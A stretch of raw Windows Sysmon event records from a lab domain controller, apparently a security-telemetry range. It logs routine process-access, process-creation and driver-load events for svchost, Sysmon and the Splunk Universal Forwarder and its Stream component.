13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:58.508{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4801-000000009101}664C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.979{10ACEC4A-85ED-5FCF-4801-000000009101}664C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007669Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F0-5FCF-4901-000000009101}3056C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007668Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007667Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007666Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007665Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007664Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007663Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007662Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85F0-5FCF-4901-000000009101}3056C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.866{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85F0-5FCF-4901-000000009101}3056C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:00.867{10ACEC4A-85F0-5FCF-4901-000000009101}3056C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 644600x80000000000000007695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.491C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CBtrueRiverbed Technology, Inc.Valid 10341000x80000000000000007694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.554{10ACEC4A-8541-5FCF-1500-000000009101}13644136C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007693Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85F1-5FCF-4A01-000000009101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007692Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:01.538{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85F1-5FCF-4A01-000000009101}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007691Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 